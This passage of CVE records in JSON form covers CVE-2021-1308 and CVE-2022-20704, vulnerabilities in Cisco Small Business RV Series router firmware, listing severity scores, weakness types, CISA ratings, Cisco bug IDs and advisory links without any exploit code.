                  name: "20210407 Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_CISCO",
                     "x_transferred",
                  ],
                  url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe",
               },
            ],
            title: "CVE Program Container",
         },
         {
            metrics: [
               {
                  other: {
                     content: {
                        id: "CVE-2021-1308",
                        options: [
                           {
                              Exploitation: "none",
                           },
                           {
                              Automatable: "no",
                           },
                           {
                              "Technical Impact": "partial",
                           },
                        ],
                        role: "CISA Coordinator",
                        timestamp: "2024-11-08T20:46:54.264964Z",
                        version: "2.0.3",
                     },
                     type: "ssvc",
                  },
               },
            ],
            providerMetadata: {
               dateUpdated: "2024-11-08T23:29:49.703Z",
               orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0",
               shortName: "CISA-ADP",
            },
            title: "CISA ADP Vulnrichment",
         },
      ],
      cna: {
         affected: [
            {
               product: "Cisco Small Business RV Series Router Firmware",
               vendor: "Cisco",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2021-04-07T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).",
            },
         ],
         exploits: [
            {
               lang: "en",
               value: "The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.",
            },
         ],
         metrics: [
            {
               cvssV3_1: {
                  attackComplexity: "LOW",
                  attackVector: "ADJACENT_NETWORK",
                  availabilityImpact: "HIGH",
                  baseScore: 7.4,
                  baseSeverity: "HIGH",
                  confidentialityImpact: "NONE",
                  integrityImpact: "NONE",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                  version: "3.1",
               },
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     cweId: "CWE-119",
                     description: "CWE-119",
                     lang: "en",
                     type: "CWE",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2021-04-08T04:05:26",
            orgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
            shortName: "cisco",
         },
         references: [
            {
               name: "20210407 Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
               tags: [
                  "vendor-advisory",
                  "x_refsource_CISCO",
               ],
               url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe",
            },
         ],
         source: {
            advisory: "cisco-sa-rv-multi-lldp-u7e4chCe",
            defect: [
               [
                  "CSCvw62392",
                  "CSCvw62395",
                  "CSCvw62410",
                  "CSCvw62411",
                  "CSCvw62413",
                  "CSCvw62416",
                  "CSCvw62417",
                  "CSCvw62418",
                  "CSCvw94339",
                  "CSCvw94341",
                  "CSCvw95016",
                  "CSCvw95017",
               ],
            ],
            discovery: "INTERNAL",
         },
         title: "Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@cisco.com",
               DATE_PUBLIC: "2021-04-07T16:00:00",
               ID: "CVE-2021-1308",
               STATE: "PUBLIC",
               TITLE: "Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "Cisco Small Business RV Series Router Firmware",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "Cisco",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Multiple vulnerabilities exist in the Link Layer Discovery Protocol (LLDP) implementation for Cisco Small Business RV Series Routers. An unauthenticated, adjacent attacker could execute arbitrary code or cause an affected router to leak system memory or reload. A memory leak or device reload would cause a denial of service (DoS) condition on an affected device. For more information about these vulnerabilities, see the Details section of this advisory. Note: LLDP is a Layer 2 protocol. To exploit these vulnerabilities, an attacker must be in the same broadcast domain as the affected device (Layer 2 adjacent).",
                  },
               ],
            },
            exploit: [
               {
                  lang: "en",
                  value: "The Cisco Product Security Incident Response Team (PSIRT) is not aware of any public announcements or malicious use of the vulnerabilities that are described in this advisory.",
               },
            ],
            impact: {
               cvss: {
                  baseScore: "8.8",
                  vectorString: "CVSS:3.1/AV:A/AC:L/PR:N/UI:N/S:C/C:N/I:N/A:H",
                  version: "3.0",
               },
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "CWE-119",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "20210407 Cisco Small Business RV Series Routers Link Layer Discovery Protocol Vulnerabilities",
                     refsource: "CISCO",
                     url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-rv-multi-lldp-u7e4chCe",
                  },
               ],
            },
            source: {
               advisory: "cisco-sa-rv-multi-lldp-u7e4chCe",
               defect: [
                  [
                     "CSCvw62392",
                     "CSCvw62395",
                     "CSCvw62410",
                     "CSCvw62411",
                     "CSCvw62413",
                     "CSCvw62416",
                     "CSCvw62417",
                     "CSCvw62418",
                     "CSCvw94339",
                     "CSCvw94341",
                     "CSCvw95016",
                     "CSCvw95017",
                  ],
               ],
               discovery: "INTERNAL",
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
      assignerShortName: "cisco",
      cveId: "CVE-2021-1308",
      datePublished: "2021-04-08T04:05:26.191723Z",
      dateReserved: "2020-11-13T00:00:00",
      dateUpdated: "2024-11-08T23:29:49.703Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}

cve-2022-20704
Vulnerability from cvelistv5
Published
2022-02-10 17:06
Modified
2024-11-06 16:31
Severity ?
Summary
Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.
Impacted products
Vendor Product Version
Cisco Cisco Small Business RV Series Router Firmware Version: n/a
Show details on NVD website


{
   containers: {
      adp: [
         {
            providerMetadata: {
               dateUpdated: "2024-08-03T02:24:48.463Z",
               orgId: "af854a3a-2127-422b-91ae-364da2661108",
               shortName: "CVE",
            },
            references: [
               {
                  name: "20220203 Cisco Small Business RV Series Routers Vulnerabilities",
                  tags: [
                     "vendor-advisory",
                     "x_refsource_CISCO",
                     "x_transferred",
                  ],
                  url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
               },
               {
                  tags: [
                     "x_refsource_MISC",
                     "x_transferred",
                  ],
                  url: "https://www.zerodayinitiative.com/advisories/ZDI-22-413/",
               },
            ],
            title: "CVE Program Container",
         },
         {
            metrics: [
               {
                  other: {
                     content: {
                        id: "CVE-2022-20704",
                        options: [
                           {
                              Exploitation: "none",
                           },
                           {
                              Automatable: "yes",
                           },
                           {
                              "Technical Impact": "total",
                           },
                        ],
                        role: "CISA Coordinator",
                        timestamp: "2024-11-06T16:02:59.086524Z",
                        version: "2.0.3",
                     },
                     type: "ssvc",
                  },
               },
            ],
            providerMetadata: {
               dateUpdated: "2024-11-06T16:31:02.989Z",
               orgId: "134c704f-9b21-4f2e-91b3-4a467353bcc0",
               shortName: "CISA-ADP",
            },
            title: "CISA ADP Vulnrichment",
         },
      ],
      cna: {
         affected: [
            {
               product: "Cisco Small Business RV Series Router Firmware",
               vendor: "Cisco",
               versions: [
                  {
                     status: "affected",
                     version: "n/a",
                  },
               ],
            },
         ],
         datePublic: "2022-02-03T00:00:00",
         descriptions: [
            {
               lang: "en",
               value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.",
            },
         ],
         exploits: [
            {
               lang: "en",
               value: "The Cisco PSIRT is aware that proof-of-concept exploit code is available for several of the vulnerabilities that are described in this advisory.",
            },
         ],
         metrics: [
            {
               cvssV3_1: {
                  attackComplexity: "LOW",
                  attackVector: "NETWORK",
                  availabilityImpact: "HIGH",
                  baseScore: 10,
                  baseSeverity: "CRITICAL",
                  confidentialityImpact: "HIGH",
                  integrityImpact: "HIGH",
                  privilegesRequired: "NONE",
                  scope: "CHANGED",
                  userInteraction: "NONE",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.1",
               },
            },
         ],
         problemTypes: [
            {
               descriptions: [
                  {
                     cweId: "CWE-121",
                     description: "CWE-121",
                     lang: "en",
                     type: "CWE",
                  },
               ],
            },
         ],
         providerMetadata: {
            dateUpdated: "2022-02-22T22:06:32",
            orgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
            shortName: "cisco",
         },
         references: [
            {
               name: "20220203 Cisco Small Business RV Series Routers Vulnerabilities",
               tags: [
                  "vendor-advisory",
                  "x_refsource_CISCO",
               ],
               url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
            },
            {
               tags: [
                  "x_refsource_MISC",
               ],
               url: "https://www.zerodayinitiative.com/advisories/ZDI-22-413/",
            },
         ],
         source: {
            advisory: "cisco-sa-smb-mult-vuln-KA9PK6D",
            defect: [
               [
                  "CSCvz88279",
                  "CSCvz94704",
                  "CSCwa12732",
                  "CSCwa12748",
                  "CSCwa12836",
                  "CSCwa13115",
                  "CSCwa13119",
                  "CSCwa13205",
                  "CSCwa13682",
                  "CSCwa13836",
                  "CSCwa13882",
                  "CSCwa13888",
                  "CSCwa13900",
                  "CSCwa14007",
                  "CSCwa14008",
                  "CSCwa14564",
                  "CSCwa14565",
                  "CSCwa14601",
                  "CSCwa14602",
                  "CSCwa15167",
                  "CSCwa15168",
                  "CSCwa18769",
                  "CSCwa18770",
                  "CSCwa32432",
                  "CSCwa36774",
                  "CSCwa54598",
               ],
            ],
            discovery: "INTERNAL",
         },
         title: "Cisco Small Business RV Series Routers Vulnerabilities",
         x_legacyV4Record: {
            CVE_data_meta: {
               ASSIGNER: "psirt@cisco.com",
               DATE_PUBLIC: "2022-02-03T00:00:00",
               ID: "CVE-2022-20704",
               STATE: "PUBLIC",
               TITLE: "Cisco Small Business RV Series Routers Vulnerabilities",
            },
            affects: {
               vendor: {
                  vendor_data: [
                     {
                        product: {
                           product_data: [
                              {
                                 product_name: "Cisco Small Business RV Series Router Firmware",
                                 version: {
                                    version_data: [
                                       {
                                          version_value: "n/a",
                                       },
                                    ],
                                 },
                              },
                           ],
                        },
                        vendor_name: "Cisco",
                     },
                  ],
               },
            },
            data_format: "MITRE",
            data_type: "CVE",
            data_version: "4.0",
            description: {
               description_data: [
                  {
                     lang: "eng",
                     value: "Multiple vulnerabilities in Cisco Small Business RV160, RV260, RV340, and RV345 Series Routers could allow an attacker to do any of the following: Execute arbitrary code Elevate privileges Execute arbitrary commands Bypass authentication and authorization protections Fetch and run unsigned software Cause denial of service (DoS) For more information about these vulnerabilities, see the Details section of this advisory.",
                  },
               ],
            },
            exploit: [
               {
                  lang: "en",
                  value: "The Cisco PSIRT is aware that proof-of-concept exploit code is available for several of the vulnerabilities that are described in this advisory.",
               },
            ],
            impact: {
               cvss: {
                  baseScore: "10.0",
                  vectorString: "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:C/C:H/I:H/A:H",
                  version: "3.0",
               },
            },
            problemtype: {
               problemtype_data: [
                  {
                     description: [
                        {
                           lang: "eng",
                           value: "CWE-121",
                        },
                     ],
                  },
               ],
            },
            references: {
               reference_data: [
                  {
                     name: "20220203 Cisco Small Business RV Series Routers Vulnerabilities",
                     refsource: "CISCO",
                     url: "https://tools.cisco.com/security/center/content/CiscoSecurityAdvisory/cisco-sa-smb-mult-vuln-KA9PK6D",
                  },
                  {
                     name: "https://www.zerodayinitiative.com/advisories/ZDI-22-413/",
                     refsource: "MISC",
                     url: "https://www.zerodayinitiative.com/advisories/ZDI-22-413/",
                  },
               ],
            },
            source: {
               advisory: "cisco-sa-smb-mult-vuln-KA9PK6D",
               defect: [
                  [
                     "CSCvz88279",
                     "CSCvz94704",
                     "CSCwa12732",
                     "CSCwa12748",
                     "CSCwa12836",
                     "CSCwa13115",
                     "CSCwa13119",
                     "CSCwa13205",
                     "CSCwa13682",
                     "CSCwa13836",
                     "CSCwa13882",
                     "CSCwa13888",
                     "CSCwa13900",
                     "CSCwa14007",
                     "CSCwa14008",
                     "CSCwa14564",
                     "CSCwa14565",
                     "CSCwa14601",
                     "CSCwa14602",
                     "CSCwa15167",
                     "CSCwa15168",
                     "CSCwa18769",
                     "CSCwa18770",
                     "CSCwa32432",
                     "CSCwa36774",
                     "CSCwa54598",
                  ],
               ],
               discovery: "INTERNAL",
            },
         },
      },
   },
   cveMetadata: {
      assignerOrgId: "d1c1063e-7a18-46af-9102-31f8928bc633",
      assignerShortName: "cisco",
      cveId: "CVE-2022-20704",
      datePublished: "2022-02-10T17:06:30.172497Z",
      dateReserved: "2021-11-02T00:00:00",
      dateUpdated: "2024-11-06T16:31:02.989Z",
      state: "PUBLISHED",
   },
   dataType: "CVE_RECORD",
   dataVersion: "5.1",
}